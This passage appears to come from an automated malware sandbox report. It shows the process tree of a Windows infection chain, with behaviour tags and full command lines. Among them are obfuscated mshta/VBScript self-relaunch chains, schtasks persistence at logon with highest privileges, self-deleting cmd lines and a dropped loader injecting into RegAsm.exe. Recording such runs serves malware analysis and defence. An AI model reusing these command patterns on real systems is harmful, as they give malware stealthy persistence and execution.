                                                                                                "C:\Users\Admin\Documents\x1jKPgHFu8NfOFUEb3sHI1YF.exe"
                                                                                                11⤵
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks whether UAC is enabled
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                PID:5788
                                                                                              • C:\Users\Admin\Documents\4lx3YaEwYlVQN2yD0dE9agGn.exe
                                                                                                "C:\Users\Admin\Documents\4lx3YaEwYlVQN2yD0dE9agGn.exe"
                                                                                                11⤵
                                                                                                  PID:5988
                                                                                                • C:\Users\Admin\Documents\3YdZqLRJgrArjR6eUBM3vpug.exe
                                                                                                  "C:\Users\Admin\Documents\3YdZqLRJgrArjR6eUBM3vpug.exe"
                                                                                                  11⤵
                                                                                                  • Drops file in Program Files directory
                                                                                                  PID:6512
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                    12⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:6260
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                    12⤵
                                                                                                    • Creates scheduled task(s)
                                                                                                    PID:5500
                                                                                                • C:\Users\Admin\Documents\ZnloqqT3MGmwM9v6trKUnXoA.exe
                                                                                                  "C:\Users\Admin\Documents\ZnloqqT3MGmwM9v6trKUnXoA.exe"
                                                                                                  11⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:6400
                                                                                                  • C:\Users\Admin\Documents\ZnloqqT3MGmwM9v6trKUnXoA.exe
                                                                                                    "C:\Users\Admin\Documents\ZnloqqT3MGmwM9v6trKUnXoA.exe"
                                                                                                    12⤵
                                                                                                      PID:1172
                                                                                                  • C:\Users\Admin\Documents\mbCOA3TDkC0riF5u09gmdGaX.exe
                                                                                                    "C:\Users\Admin\Documents\mbCOA3TDkC0riF5u09gmdGaX.exe"
                                                                                                    11⤵
                                                                                                      PID:6880
                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                        "C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL"). Run ( "cmD.exe /Q /c TYPE ""C:\Users\Admin\Documents\mbCOA3TDkC0riF5u09gmdGaX.exe"" > X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if """" == """" for %A IN ( ""C:\Users\Admin\Documents\mbCOA3TDkC0riF5u09gmdGaX.exe"" ) do taskkill /f -im ""%~nxA"" " , 0 , trUE ) )
                                                                                                        12⤵
                                                                                                          PID:4448
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\Documents\mbCOA3TDkC0riF5u09gmdGaX.exe"> X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if "" == "" for %A IN ( "C:\Users\Admin\Documents\mbCOA3TDkC0riF5u09gmdGaX.exe" ) do taskkill /f -im "%~nxA"
                                                                                                            13⤵
                                                                                                              PID:6316
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE
                                                                                                                X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV
                                                                                                                14⤵
                                                                                                                  PID:6176
                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                    "C:\Windows\System32\mshta.exe" VbScRIpt: CloSE ( CReATEobJECT ( "WscrIpt.SheLL"). Run ( "cmD.exe /Q /c TYPE ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" > X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if ""-PXPoqL0iOUHHP7hXFattB5ZvsV "" == """" for %A IN ( ""C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"" ) do taskkill /f -im ""%~nxA"" " , 0 , trUE ) )
                                                                                                                    15⤵
                                                                                                                      PID:1360
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /Q /c TYPE "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE"> X4d4XArNWDu.eXE && StArt X4D4XarNWDu.Exe -PXPoqL0iOUHHP7hXFattB5ZvsV & if "-PXPoqL0iOUHHP7hXFattB5ZvsV " == "" for %A IN ( "C:\Users\Admin\AppData\Local\Temp\X4d4XArNWDu.eXE" ) do taskkill /f -im "%~nxA"
                                                                                                                        16⤵
                                                                                                                          PID:7944
                                                                                                                      • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                        "C:\Windows\System32\regsvr32.exe" -S fOUT6o7J.Mj
                                                                                                                        15⤵
                                                                                                                          PID:7404
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /f -im "mbCOA3TDkC0riF5u09gmdGaX.exe"
                                                                                                                        14⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:4232
                                                                                                                • C:\Users\Admin\Documents\OjNhYFHhVDEDXnnibdDcEG8s.exe
                                                                                                                  "C:\Users\Admin\Documents\OjNhYFHhVDEDXnnibdDcEG8s.exe"
                                                                                                                  11⤵
                                                                                                                    PID:4012
                                                                                                                  • C:\Users\Admin\Documents\ms9hOiM08JL47kHixKYNIe3U.exe
                                                                                                                    "C:\Users\Admin\Documents\ms9hOiM08JL47kHixKYNIe3U.exe"
                                                                                                                    11⤵
                                                                                                                      PID:7076
                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                        12⤵
                                                                                                                          PID:7856
                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                                                            13⤵
                                                                                                                              PID:7884
                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7884.0.1113958087\237604357" -parentBuildID 20200403170909 -prefsHandle 1520 -prefMapHandle 1512 -prefsLen 1 -prefMapSize 219808 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7884 "\\.\pipe\gecko-crash-server-pipe.7884" 1604 gpu
                                                                                                                                14⤵
                                                                                                                                  PID:8060
                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7884.3.389510991\2125678987" -childID 1 -isForBrowser -prefsHandle 5900 -prefMapHandle 5896 -prefsLen 500 -prefMapSize 219808 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7884 "\\.\pipe\gecko-crash-server-pipe.7884" 5912 tab
                                                                                                                                  14⤵
                                                                                                                                    PID:7396
                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7884.13.456065046\1835966122" -childID 2 -isForBrowser -prefsHandle 5476 -prefMapHandle 5352 -prefsLen 1367 -prefMapSize 219808 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7884 "\\.\pipe\gecko-crash-server-pipe.7884" 5464 tab
                                                                                                                                    14⤵
                                                                                                                                      PID:8108
                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7884.20.1485340803\408960144" -childID 3 -isForBrowser -prefsHandle 6248 -prefMapHandle 6264 -prefsLen 7429 -prefMapSize 219808 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7884 "\\.\pipe\gecko-crash-server-pipe.7884" 2628 tab
                                                                                                                                      14⤵
                                                                                                                                        PID:4288
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                                                    12⤵
                                                                                                                                      PID:7264
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=93.0.4577.63 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7fffea44a380,0x7fffea44a390,0x7fffea44a3a0
                                                                                                                                        13⤵
                                                                                                                                          PID:5460
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1708,8046365739136141409,13002843550150844473,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1728 /prefetch:2
                                                                                                                                          13⤵
                                                                                                                                            PID:1472
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1708,8046365739136141409,13002843550150844473,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1804 /prefetch:8
                                                                                                                                            13⤵
                                                                                                                                              PID:5996
                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1708,8046365739136141409,13002843550150844473,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1788 /prefetch:8
                                                                                                                                              13⤵
                                                                                                                                                PID:3200
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1708,8046365739136141409,13002843550150844473,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:1
                                                                                                                                                13⤵
                                                                                                                                                  PID:8416
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1708,8046365739136141409,13002843550150844473,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:1
                                                                                                                                                  13⤵
                                                                                                                                                    PID:8468
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1708,8046365739136141409,13002843550150844473,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                                                                                                                                                    13⤵
                                                                                                                                                      PID:8600
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1708,8046365739136141409,13002843550150844473,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
                                                                                                                                                      13⤵
                                                                                                                                                        PID:8636
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1708,8046365739136141409,13002843550150844473,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3748 /prefetch:1
                                                                                                                                                        13⤵
                                                                                                                                                          PID:8668
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1708,8046365739136141409,13002843550150844473,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1
                                                                                                                                                          13⤵
                                                                                                                                                            PID:8700
                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --field-trial-handle=1708,8046365739136141409,13002843550150844473,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3756 /prefetch:8
                                                                                                                                                            13⤵
                                                                                                                                                              PID:7660
                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe
                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel=stable --force-configure-user-settings
                                                                                                                                                              13⤵
                                                                                                                                                                PID:5684
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=93.0.4577.63 --initial-client-data=0x240,0x244,0x248,0x21c,0x24c,0x7ff746c56ee0,0x7ff746c56ef0,0x7ff746c56f00
                                                                                                                                                                  14⤵
                                                                                                                                                                    PID:8768
                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1708,8046365739136141409,13002843550150844473,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3592 /prefetch:8
                                                                                                                                                                  13⤵
                                                                                                                                                                    PID:9196
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1708,8046365739136141409,13002843550150844473,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=904 /prefetch:8
                                                                                                                                                                    13⤵
                                                                                                                                                                      PID:8324
                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1708,8046365739136141409,13002843550150844473,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAQAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4904 /prefetch:2
                                                                                                                                                                      13⤵
                                                                                                                                                                        PID:4336
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      "cmd.exe" /C taskkill /F /PID 7076 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ms9hOiM08JL47kHixKYNIe3U.exe"
                                                                                                                                                                      12⤵
                                                                                                                                                                        PID:8288
                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                          taskkill /F /PID 7076
                                                                                                                                                                          13⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          PID:9180
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "cmd.exe" /C taskkill /F /PID 7076 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\ms9hOiM08JL47kHixKYNIe3U.exe"
                                                                                                                                                                        12⤵
                                                                                                                                                                          PID:8280
                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                            taskkill /F /PID 7076
                                                                                                                                                                            13⤵
                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                            PID:9172
                                                                                                                                                                      • C:\Users\Admin\Documents\QApk23aas0XGweU3V2JcKz6i.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\QApk23aas0XGweU3V2JcKz6i.exe"
                                                                                                                                                                        11⤵
                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                        PID:5040
                                                                                                                                                                      • C:\Users\Admin\Documents\lqJc_WsSPRQehfx8E8xIQA9b.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\lqJc_WsSPRQehfx8E8xIQA9b.exe"
                                                                                                                                                                        11⤵
                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                        PID:6484
                                                                                                                                                                      • C:\Users\Admin\Documents\dtbT9hjQjQzFJIyYVI1XzRFb.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\dtbT9hjQjQzFJIyYVI1XzRFb.exe"
                                                                                                                                                                        11⤵
                                                                                                                                                                          PID:3328
                                                                                                                                                                          • C:\Users\Admin\Documents\dtbT9hjQjQzFJIyYVI1XzRFb.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\dtbT9hjQjQzFJIyYVI1XzRFb.exe"
                                                                                                                                                                            12⤵
                                                                                                                                                                              PID:816
                                                                                                                                                                          • C:\Users\Admin\Documents\e_XWglKzH2rj5rN7GPe0HSEC.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\e_XWglKzH2rj5rN7GPe0HSEC.exe"
                                                                                                                                                                            11⤵
                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                            PID:4248
                                                                                                                                                                            • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                              dllhost.exe
                                                                                                                                                                              12⤵
                                                                                                                                                                                PID:6148
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                cmd /c cmd < Nobile.docm
                                                                                                                                                                                12⤵
                                                                                                                                                                                  PID:2456
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    cmd
                                                                                                                                                                                    13⤵
                                                                                                                                                                                      PID:4840
                                                                                                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                        findstr /V /R "^mFzuIhvmvbdHpfegBQvdRBWtkZruqmiMQZvPfzkmbfdsclZwZBnIIvmXJgVJldnWdERlThYiFXSCkFJqZwimwmrxmnuwnBfiQxqRzPi$" Vederlo.docm
                                                                                                                                                                                        14⤵
                                                                                                                                                                                          PID:1764
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com
                                                                                                                                                                                          Rimasta.exe.com J
                                                                                                                                                                                          14⤵
                                                                                                                                                                                            PID:8052
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J
                                                                                                                                                                                              15⤵
                                                                                                                                                                                                PID:8140
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J
                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                    PID:8148
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Rimasta.exe.com J
                                                                                                                                                                                                      17⤵
                                                                                                                                                                                                        PID:5500
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RegAsm.exe
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RegAsm.exe
                                                                                                                                                                                                          18⤵
                                                                                                                                                                                                            PID:7368
                                                                                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                    ping localhost
                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                                                    PID:5948
                                                                                                                                                                                            • C:\Users\Admin\Documents\_5k1vsGVvumkTM2TUskRNqdR.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\_5k1vsGVvumkTM2TUskRNqdR.exe"
                                                                                                                                                                                              11⤵
                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                              PID:212
                                                                                                                                                                                              • C:\Users\Admin\Documents\_5k1vsGVvumkTM2TUskRNqdR.exe
                                                                                                                                                                                                C:\Users\Admin\Documents\_5k1vsGVvumkTM2TUskRNqdR.exe
                                                                                                                                                                                                12⤵
                                                                                                                                                                                                  PID:1496
                                                                                                                                                                                              • C:\Users\Admin\Documents\qRKUZcwvt7EQHDDKfDu0x1Zf.exe
                                                                                                                                                                                                "C:\Users\Admin\Documents\qRKUZcwvt7EQHDDKfDu0x1Zf.exe"
                                                                                                                                                                                                11⤵
                                                                                                                                                                                                  PID:4220
                                                                                                                                                                                                • C:\Users\Admin\Documents\4vkhIlVrIXz4Zirher7l8OUQ.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\4vkhIlVrIXz4Zirher7l8OUQ.exe"
                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                    PID:6072
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\{B840C5EA-6A6C-47DB-8714-9DCFC924C9E1}\4vkhIlVrIXz4Zirher7l8OUQ.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\{B840C5EA-6A6C-47DB-8714-9DCFC924C9E1}\4vkhIlVrIXz4Zirher7l8OUQ.exe /q"C:\Users\Admin\Documents\4vkhIlVrIXz4Zirher7l8OUQ.exe" /tempdisk1folder"C:\Users\Admin\AppData\Local\Temp\{B840C5EA-6A6C-47DB-8714-9DCFC924C9E1}" /IS_temp
                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                        PID:2276
                                                                                                                                                                                                        • C:\Windows\SysWOW64\MSIEXEC.EXE
                                                                                                                                                                                                          "C:\Windows\system32\MSIEXEC.EXE" /i "C:\Users\Admin\AppData\Local\Downloaded Installations\{1AF874E8-B60B-4D74-97B3-5CC53DC87DBC}\menageudrivers.msi" SETUPEXEDIR="C:\Users\Admin\Documents" SETUPEXENAME="4vkhIlVrIXz4Zirher7l8OUQ.exe"
                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                          PID:2440
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\MSI38DE.tmp
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\MSI38DE.tmp"
                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                              PID:7336
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\MSI3708.tmp
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\MSI3708.tmp"
                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                PID:7328
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\MSI38CE.tmp
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\MSI38CE.tmp"
                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                  PID:7320
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Program Files (x86)\SmartPDF\SmartPDF\Setup.exe"
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:4604
                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                              ping 1.1.1.1 -n 1 -w 100
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                              PID:5780
                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                              ping 1.1.1.1 -n 1 -w 900
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                              PID:7712
                                                                                                                                                                                                        • C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe
                                                                                                                                                                                                          "C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                          PID:6248
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-1KQ4R.tmp\stats.tmp
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-1KQ4R.tmp\stats.tmp" /SL5="$5014A,138429,56832,C:\Program Files (x86)\SmartPDF\SmartPDF\stats.exe" /Verysilent
                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                              PID:6424
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-67GE7.tmp\Setup.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-67GE7.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                  PID:6320
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
                                                                                                                                                                                                                    12⤵
                                                                                                                                                                                                                      PID:6436
                                                                                                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                        PID:6424
                                                                                                                                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                        schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                        PID:208
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                        PID:6428
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Services.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Services.exe"
                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                        PID:6272
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"' & exit
                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                            PID:3028
                                                                                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                              schtasks /create /f /sc onlogon /rl highest /tn "Services" /tr '"C:\Users\Admin\AppData\Local\Temp\Services.exe"'
                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:5704
